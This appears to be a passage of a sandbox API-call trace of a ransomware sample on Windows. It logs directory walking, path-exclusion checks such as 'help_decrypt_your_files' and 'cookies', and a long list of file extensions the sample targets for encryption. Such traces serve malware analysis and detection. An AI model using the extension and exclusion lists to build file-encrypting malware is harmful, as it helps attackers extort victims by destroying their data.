	[0172.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0172.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0172.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0172.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0172.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0172.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.788] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0172.788] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0172.788] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa214da47, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa214da47, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2173cb2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xbd7, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0172.788] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0172.788] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0172.788] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\"
	[0172.788] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml"
	[0172.788] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0172.789] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.789] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0172.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.789] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.789] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml"
	[0172.789] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_0.provxml") returned 109
	[0172.789] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.790] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0172.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.790] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0172.791] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2199f29, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2199f29, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2199f29, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0172.791] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0172.791] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0172.791] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\"
	[0172.791] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml"
	[0172.792] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0172.792] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.792] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0172.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.792] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.792] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml"
	[0172.792] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_1.provxml") returned 109
	[0172.792] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.793] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0172.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.793] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0172.793] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1
	[0172.794] lstrcmpW (lpString1="Power_2.provxml", lpString2="..") returned 1
	[0172.794] lstrcmpW (lpString1="Power_2.provxml", lpString2=".") returned 1
	[0172.794] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\"
	[0172.794] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\", lpString2="Power_2.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml"
